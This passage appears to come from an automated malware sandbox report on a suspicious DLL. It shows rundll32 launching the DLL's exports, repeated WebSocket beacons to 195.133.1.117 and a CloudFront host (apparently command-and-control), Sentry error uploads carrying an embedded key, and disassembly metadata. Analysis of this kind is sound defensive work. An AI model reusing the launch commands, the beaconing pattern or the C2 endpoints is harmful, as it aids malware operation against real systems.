                                  9 | 192.168.2.6 | 49909 | 13.227.9.48 | 80 | 5328 | C:\Windows\System32\rundll32.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Dec 19, 2024 15:34:40.469644070 CET | 170 | OUT | GET /ws HTTP/1.1
                                  Host: d2np1vqkcxhde6.cloudfront.net
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: o9P6bbQkBpkHJSDprgi2YQ==
                                  Dec 19, 2024 15:34:42.144905090 CET | 363 | IN | HTTP/1.1 101 Switching Protocols
                                  Connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: 0ANSTJ1HNt7NA5JJj55kxT4anCA=
                                  date: Thu, 19 Dec 2024 14:34:41 GMT
                                  X-Cache: Miss from cloudfront
                                  Via: 1.1 5064313e440a4fd329eb4dda0aa4fb12.cloudfront.net (CloudFront)
                                  X-Amz-Cf-Pop: BAH53-C1
                                  X-Amz-Cf-Id: hhxQSlPdp4ayneHUZtqf45MHfeHGr_tEi20RpYFkDFJiYoYcX3-wPA==


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  10 | 192.168.2.6 | 49927 | 195.133.1.117 | 80 | 5328 | C:\Windows\System32\rundll32.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Dec 19, 2024 15:34:48.027105093 CET | 154 | OUT | GET /ws HTTP/1.1
                                  Host: 195.133.1.117
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: MG/wcOLqwZyraIHV6mN2eA==
                                  Dec 19, 2024 15:34:49.359086990 CET | 166 | IN | HTTP/1.1 101 Switching Protocols
                                  connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: 55D2TOQn2PTDwUXD9oE2QwDEakg=
                                  date: Thu, 19 Dec 2024 14:34:48 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  11 | 192.168.2.6 | 49945 | 13.227.9.48 | 80 | 5328 | C:\Windows\System32\rundll32.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Dec 19, 2024 15:34:55.589782000 CET | 170 | OUT | GET /ws HTTP/1.1
                                  Host: d2np1vqkcxhde6.cloudfront.net
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: enC0Es7mdVSw6GUwznNaLQ==
                                  Dec 19, 2024 15:34:57.333468914 CET | 363 | IN | HTTP/1.1 101 Switching Protocols
                                  Connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: 5jnj1jyCZYTV24H3SS027dXjv0c=
                                  date: Thu, 19 Dec 2024 14:34:56 GMT
                                  X-Cache: Miss from cloudfront
                                  Via: 1.1 28067c3a345fdd5277603bfdb86abe14.cloudfront.net (CloudFront)
                                  X-Amz-Cf-Pop: BAH53-C1
                                  X-Amz-Cf-Id: 0qXiGbeqOklCvAwUvrO7qwHl0DeUuy8lwPwwGZWQusdZi8p7xkf9aA==


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  12 | 192.168.2.6 | 49960 | 195.133.1.117 | 80 | 5328 | C:\Windows\System32\rundll32.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Dec 19, 2024 15:35:03.235033035 CET | 154 | OUT | GET /ws HTTP/1.1
                                  Host: 195.133.1.117
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: YZ6gImeX26KgQbaMt7jJTg==
                                  Dec 19, 2024 15:35:04.601799011 CET | 166 | IN | HTTP/1.1 101 Switching Protocols
                                  connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: TjGxtIRG2vW4vLPSHXLBt1M1HNY=
                                  date: Thu, 19 Dec 2024 14:35:04 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  13 | 192.168.2.6 | 49976 | 13.227.9.48 | 80 | 5328 | C:\Windows\System32\rundll32.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Dec 19, 2024 15:35:10.617825985 CET | 170 | OUT | GET /ws HTTP/1.1
                                  Host: d2np1vqkcxhde6.cloudfront.net
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: mgtSMK+F6GzpGcK4RpjtGQ==
                                  Dec 19, 2024 15:35:12.266375065 CET | 363 | IN | HTTP/1.1 101 Switching Protocols
                                  Connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: AwnW06BTqEgVf8LcfwaevWup0cQ=
                                  date: Thu, 19 Dec 2024 14:35:11 GMT
                                  X-Cache: Miss from cloudfront
                                  Via: 1.1 4166c47260b95e2ec3436a0df75c7f38.cloudfront.net (CloudFront)
                                  X-Amz-Cf-Pop: BAH53-C1
                                  X-Amz-Cf-Id: 1i7mp4QEyV44ihBHpwbmfjPbVbMCD2k30-y-8EMAbMY7qnFBgN1vBQ==


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  14 | 192.168.2.6 | 49994 | 195.133.1.117 | 80 | 5328 | C:\Windows\System32\rundll32.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Dec 19, 2024 15:35:18.332947016 CET | 154 | OUT | GET /ws HTTP/1.1
                                  Host: 195.133.1.117
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: 1W7A8pWbhZreG2T6Et2+aw==
                                  Dec 19, 2024 15:35:19.653090954 CET | 166 | IN | HTTP/1.1 101 Switching Protocols
                                  connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: tzeXzASyAvZi/sJc9VNvZxqDOYw=
                                  date: Thu, 19 Dec 2024 14:35:19 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  15 | 192.168.2.6 | 50010 | 13.227.9.48 | 80 | 5328 | C:\Windows\System32\rundll32.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Dec 19, 2024 15:35:25.394576073 CET170OUTGET /ws HTTP/1.1
                                  Host: d2np1vqkcxhde6.cloudfront.net
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: 3bAo+RHHQYr0rCo3Cvgr5g==
                                  Dec 19, 2024 15:35:27.055901051 CET363INHTTP/1.1 101 Switching Protocols
                                  Connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: cBed5rCQtyHPmC4tQfJk23cMoxQ=
                                  date: Thu, 19 Dec 2024 14:35:26 GMT
                                  X-Cache: Miss from cloudfront
                                  Via: 1.1 5064313e440a4fd329eb4dda0aa4fb12.cloudfront.net (CloudFront)
                                  X-Amz-Cf-Pop: BAH53-C1
                                  X-Amz-Cf-Id: RFjItj10HZffYaQV4jRPFiTDzmR9RAmN-s_hU0CMu7OCoxvUXf3q4A==
                                  Dec 19, 2024 15:35:27.295422077 CET193OUTData Raw: 82 fe 00 b9 1e c9 d5 2a 1e c1 b0 44 79 a0 bb 4f 7b bb de 6f 50 8e 9c 64 5b 8c 87 07 4e 8a de 6f 50 8e 9c 64 5b 8c 87 07 4e 8a d4 18 45 9b e5 77 3e 9b 91 7e 4d 8a f9 0a 2f e9 b3 4b 77 a5 f9 0a 2c e9 b3 4b 77 a5 f9 0a 2a e9 b3 4b 77 a5 f9 0a 28 e9
                                  Data Ascii: *DyO{oPd[NoPd[NEw>~M/Kw,Kw*Kw(Kw&Kwkp\wY1Ik^gErX^wC{bqy{Xw0+Ox'&|-.|(*0*
                                  Dec 19, 2024 15:35:27.415915966 CET6OUTData Raw: 89 80 cf fb fa 12
                                  Data Ascii:
                                  Dec 19, 2024 15:35:27.901771069 CET2INData Raw: 88 00
                                  Data Ascii:


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  16 | 192.168.2.6 | 50017 | 195.133.1.117 | 80 | 5328 | C:\Windows\System32\rundll32.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Dec 19, 2024 15:35:33.036667109 CET154OUTGET /ws HTTP/1.1
                                  Host: 195.133.1.117
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: RWInDnK7aInVBvxdqgFRfw==
                                  Dec 19, 2024 15:35:34.405636072 CET166INHTTP/1.1 101 Switching Protocols
                                  connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: jclyKO+hHwhemsGdt2EXetRssEs=
                                  date: Thu, 19 Dec 2024 14:35:33 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  0 | 192.168.2.6 | 49769 | 34.120.62.213 | 443 | 5328 | C:\Windows\System32\rundll32.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  2024-12-19 14:33:44 UTC286OUTPOST /api/4508128821837904/envelope/ HTTP/1.1
                                  x-sentry-auth: Sentry sentry_key=d9163996e0bda3370ab4e6b347b338e4, sentry_version=7, sentry_timestamp=1734624283.5827143, sentry_client=sentry.rust/0.34.0
                                  accept: */*
                                  host: o4508128816857088.ingest.de.sentry.io
                                  content-length: 11418
                                  2024-12-19 14:33:44 UTC11418OUTData Raw: 7b 22 65 76 65 6e 74 5f 69 64 22 3a 22 39 36 63 34 36 36 32 35 2d 66 62 38 30 2d 34 62 37 38 2d 62 30 30 34 2d 34 38 36 31 62 33 38 35 64 64 32 66 22 7d 0a 7b 22 74 79 70 65 22 3a 22 65 76 65 6e 74 22 2c 22 6c 65 6e 67 74 68 22 3a 31 31 33 33 33 7d 0a 7b 22 65 76 65 6e 74 5f 69 64 22 3a 22 39 36 63 34 36 36 32 35 66 62 38 30 34 62 37 38 62 30 30 34 34 38 36 31 62 33 38 35 64 64 32 66 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 72 72 28 43 75 73 74 6f 6d 20 7b 20 6b 69 6e 64 3a 20 4f 74 68 65 72 2c 20 65 72 72 6f 72 3a 20 5c 22 43 6c 6f 73 65 64 5c 22 20 7d 29 22 2c 22 70 6c 61 74 66 6f 72 6d 22 3a 22 6e 61 74 69 76 65 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 33 34 36 32 34 32 38 38 2e 38 34 31 33 33 32 34 2c 22 73 65 72 76 65 72 5f 6e 61 6d 65 22 3a
                                  Data Ascii: {"event_id":"96c46625-fb80-4b78-b004-4861b385dd2f"}{"type":"event","length":11333}{"event_id":"96c46625fb804b78b0044861b385dd2f","message":"Err(Custom { kind: Other, error: \"Closed\" })","platform":"native","timestamp":1734624288.8413324,"server_name":
                                  2024-12-19 14:33:45 UTC672INHTTP/1.1 429 Too Many Requests
                                  server: nginx
                                  date: Thu, 19 Dec 2024 14:33:45 GMT
                                  content-type: application/json
                                  retry-after: 60
                                  x-sentry-rate-limits: 60:default;error;security;attachment:organization:error_usage_exceeded
                                  vary: origin, access-control-request-method, access-control-request-headers,accept-encoding
                                  access-control-allow-origin: *
                                  access-control-expose-headers: x-sentry-error,x-sentry-rate-limits,retry-after
                                  cross-origin-resource-policy: cross-origin
                                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                                  via: 1.1 google
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close
                                  Transfer-Encoding: chunked
                                  2024-12-19 14:33:45 UTC209INData Raw: 63 36 0d 0a 7b 22 64 65 74 61 69 6c 22 3a 22 53 65 6e 74 72 79 20 64 72 6f 70 70 65 64 20 64 61 74 61 20 64 75 65 20 74 6f 20 61 20 71 75 6f 74 61 20 6f 72 20 69 6e 74 65 72 6e 61 6c 20 72 61 74 65 20 6c 69 6d 69 74 20 62 65 69 6e 67 20 72 65 61 63 68 65 64 2e 20 54 68 69 73 20 77 69 6c 6c 20 6e 6f 74 20 61 66 66 65 63 74 20 79 6f 75 72 20 61 70 70 6c 69 63 61 74 69 6f 6e 2e 20 53 65 65 20 68 74 74 70 73 3a 2f 2f 64 6f 63 73 2e 73 65 6e 74 72 79 2e 69 6f 2f 70 72 6f 64 75 63 74 2f 61 63 63 6f 75 6e 74 73 2f 71 75 6f 74 61 73 2f 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 22 7d 0d 0a 30 0d 0a 0d 0a
                                  Data Ascii: c6{"detail":"Sentry dropped data due to a quota or internal rate limit being reached. This will not affect your application. See https://docs.sentry.io/product/accounts/quotas/ for more information."}0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  1 | 192.168.2.6 | 49933 | 34.120.62.213 | 443 | 5328 | C:\Windows\System32\rundll32.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  2024-12-19 14:34:51 UTC286OUTPOST /api/4508128821837904/envelope/ HTTP/1.1
                                  x-sentry-auth: Sentry sentry_key=d9163996e0bda3370ab4e6b347b338e4, sentry_version=7, sentry_timestamp=1734624283.5827143, sentry_client=sentry.rust/0.34.0
                                  accept: */*
                                  host: o4508128816857088.ingest.de.sentry.io
                                  content-length: 12516
                                  2024-12-19 14:34:51 UTC12516OUTData Raw: 7b 22 65 76 65 6e 74 5f 69 64 22 3a 22 62 33 64 30 38 34 35 36 2d 65 33 38 32 2d 34 35 38 66 2d 62 61 37 65 2d 38 38 36 35 35 36 34 30 61 36 36 32 22 7d 0a 7b 22 74 79 70 65 22 3a 22 65 76 65 6e 74 22 2c 22 6c 65 6e 67 74 68 22 3a 31 32 34 33 31 7d 0a 7b 22 65 76 65 6e 74 5f 69 64 22 3a 22 62 33 64 30 38 34 35 36 65 33 38 32 34 35 38 66 62 61 37 65 38 38 36 35 35 36 34 30 61 36 36 32 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 72 72 28 43 75 73 74 6f 6d 20 7b 20 6b 69 6e 64 3a 20 4f 74 68 65 72 2c 20 65 72 72 6f 72 3a 20 5c 22 43 6c 6f 73 65 64 5c 22 20 7d 29 22 2c 22 70 6c 61 74 66 6f 72 6d 22 3a 22 6e 61 74 69 76 65 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 33 34 36 32 34 33 35 36 2e 31 30 34 32 35 31 31 2c 22 73 65 72 76 65 72 5f 6e 61 6d 65 22 3a
                                  Data Ascii: {"event_id":"b3d08456-e382-458f-ba7e-88655640a662"}{"type":"event","length":12431}{"event_id":"b3d08456e382458fba7e88655640a662","message":"Err(Custom { kind: Other, error: \"Closed\" })","platform":"native","timestamp":1734624356.1042511,"server_name":
                                  2024-12-19 14:34:52 UTC672INHTTP/1.1 429 Too Many Requests
                                  server: nginx
                                  date: Thu, 19 Dec 2024 14:34:51 GMT
                                  content-type: application/json
                                  retry-after: 60
                                  x-sentry-rate-limits: 60:default;error;security;attachment:organization:error_usage_exceeded
                                  vary: origin, access-control-request-method, access-control-request-headers,accept-encoding
                                  access-control-allow-origin: *
                                  access-control-expose-headers: x-sentry-error,x-sentry-rate-limits,retry-after
                                  cross-origin-resource-policy: cross-origin
                                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                                  via: 1.1 google
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close
                                  Transfer-Encoding: chunked
                                  2024-12-19 14:34:52 UTC209INData Raw: 63 36 0d 0a 7b 22 64 65 74 61 69 6c 22 3a 22 53 65 6e 74 72 79 20 64 72 6f 70 70 65 64 20 64 61 74 61 20 64 75 65 20 74 6f 20 61 20 71 75 6f 74 61 20 6f 72 20 69 6e 74 65 72 6e 61 6c 20 72 61 74 65 20 6c 69 6d 69 74 20 62 65 69 6e 67 20 72 65 61 63 68 65 64 2e 20 54 68 69 73 20 77 69 6c 6c 20 6e 6f 74 20 61 66 66 65 63 74 20 79 6f 75 72 20 61 70 70 6c 69 63 61 74 69 6f 6e 2e 20 53 65 65 20 68 74 74 70 73 3a 2f 2f 64 6f 63 73 2e 73 65 6e 74 72 79 2e 69 6f 2f 70 72 6f 64 75 63 74 2f 61 63 63 6f 75 6e 74 73 2f 71 75 6f 74 61 73 2f 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 22 7d 0d 0a 30 0d 0a 0d 0a
                                  Data Ascii: c6{"detail":"Sentry dropped data due to a quota or internal rate limit being reached. This will not affect your application. See https://docs.sentry.io/product/accounts/quotas/ for more information."}0



                                  Target ID:0
                                  Start time:09:33:27
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\loaddll64.exe
                                  Wow64 process (32bit):false
                                  Commandline:loaddll64.exe "C:\Users\user\Desktop\8N8j6QojHn.dll"
                                  Imagebase:0x7ff662d70000
                                  File size:165'888 bytes
                                  MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:1
                                  Start time:09:33:27
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff66e660000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:2
                                  Start time:09:33:27
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",#1
                                  Imagebase:0x7ff64e0d0000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:3
                                  Start time:09:33:27
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe C:\Users\user\Desktop\8N8j6QojHn.dll,DllMain
                                  Imagebase:0x7ff7a44a0000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:4
                                  Start time:09:33:27
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",#1
                                  Imagebase:0x7ff7a44a0000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:6
                                  Start time:09:33:31
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe C:\Users\user\Desktop\8N8j6QojHn.dll,ServiceMain
                                  Imagebase:0x7ff7a44a0000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:7
                                  Start time:09:33:34
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe C:\Users\user\Desktop\8N8j6QojHn.dll,get_hostfxr_path
                                  Imagebase:0x7ff7a44a0000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:10
                                  Start time:09:33:36
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\WerFault.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 5860 -s 428
                                  Imagebase:0x7ff693eb0000
                                  File size:570'736 bytes
                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:11
                                  Start time:09:33:37
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",DllMain
                                  Imagebase:0x7ff7a44a0000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:12
                                  Start time:09:33:37
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",ServiceMain
                                  Imagebase:0x7ff7a44a0000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:13
                                  Start time:09:33:37
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\8N8j6QojHn.dll",get_hostfxr_path
                                  Imagebase:0x7ff7a44a0000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:15
                                  Start time:09:33:42
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\WerFault.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 6728 -s 428
                                  Imagebase:0x7ff693eb0000
                                  File size:570'736 bytes
                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true


                                    Execution Graph

                                    Execution Coverage:1.6%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:22%
                                    Total number of Nodes:59
                                    Total number of Limit Nodes:1

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID: ErrorLastclosesocket$acceptbind
                                    • String ID:
                                    • API String ID: 1804377370-0
                                    • Opcode ID: c7b51e8292a29a5a90fcb79761d37cf21f9b0f0c8f198b9ace2e4d1acedf13af
                                    • Instruction ID: e172f601cddf81732ccf5c8b79674a039972dd67d12f5b1a7d6af1d6280fb6ce
                                    • Opcode Fuzzy Hash: c7b51e8292a29a5a90fcb79761d37cf21f9b0f0c8f198b9ace2e4d1acedf13af
                                    • Instruction Fuzzy Hash: 9451B371B1C28186EB748F55E0953FAB3A0EF85B64F10D135EAAA03795EB3CE591CB40

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                    • String ID:
                                    • API String ID: 2933794660-0
                                    • Opcode ID: 12fd8a9f89629ea2447222c8c74297c2fbcce32a864f8b5c802af7c08dfa3724
                                    • Instruction ID: 204b09f8eb384ca7b041f59d4c1f3dbc3845bc46426ccc089143aba2d8594bbb
                                    • Opcode Fuzzy Hash: 12fd8a9f89629ea2447222c8c74297c2fbcce32a864f8b5c802af7c08dfa3724
                                    • Instruction Fuzzy Hash: 63115E32B25F058AEB10DFA0E8A42B833A4FB5A758F044E31DA2D877A5DF78E154C340

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: arenegyl$modnarod$setybdet$uespemos
                                    • API String ID: 0-66988881
                                    • Opcode ID: d3daacb50e6a5e86a45ee54e19aca212472062c4860bb173f1bcb69688a0aab6
                                    • Instruction ID: 00e8c64cd147a9a8661221adb39d53a30500ac9a482300d461d655755b2bec95
                                    • Opcode Fuzzy Hash: d3daacb50e6a5e86a45ee54e19aca212472062c4860bb173f1bcb69688a0aab6
                                    • Instruction Fuzzy Hash: 2A425AA2B18B8582EB248FA9A4606A96761F796BF4F109331DEBD137D6DF3CD141C300

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: arenegyl$modnarod$setybdet$uespemos
                                    • API String ID: 0-66988881
                                    • Opcode ID: d3ea4d561a59784e363e8fb81793ac518c78f1528762f10beb5af92a7ea12c20
                                    • Instruction ID: 5e0cddda5647e7046c292abe95bf2df2d8c8e872cee6f468d91bbee5444d67d0
                                    • Opcode Fuzzy Hash: d3ea4d561a59784e363e8fb81793ac518c78f1528762f10beb5af92a7ea12c20
                                    • Instruction Fuzzy Hash: CD3216A2B18B8542EA248FADA4616B96760FB96BA4F40D331DEBD177C6DF3CD141C300

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 341 7ffd944b1da0-7ffd944b1f26 call 7ffd944b25b0 * 2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.2414872267.00007FFD943A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD943A0000, based on PE: true
                                    • Associated: 00000006.00000002.2414842920.00007FFD943A0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415158087.00007FFD9467D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415227971.00007FFD9470D000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000006.00000002.2415249222.00007FFD94710000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ffd943a0000_rundll32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: arenegyl$modnarod$setybdet$uespemos
                                    • API String ID: 0-66988881
                                    • Opcode ID: 6913041949bbfa74934f3464e567d6e1aeceb7576476e4ec240618c533d55c3a
                                    • Instruction ID: e13c830ec3925c66a8c544e906a26d8cde19ff7801aec695140e53dfba970d8d
                                    • Opcode Fuzzy Hash: 6913041949bbfa74934f3464e567d6e1aeceb7576476e4ec240618c533d55c3a
                                    • Instruction Fuzzy Hash: C73137E6B08B8042FE54DBE4787536F9212A7457D0F90E136EE4D9BF1EDE2DD2428240

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    Strings
                                    Memory Dump Source
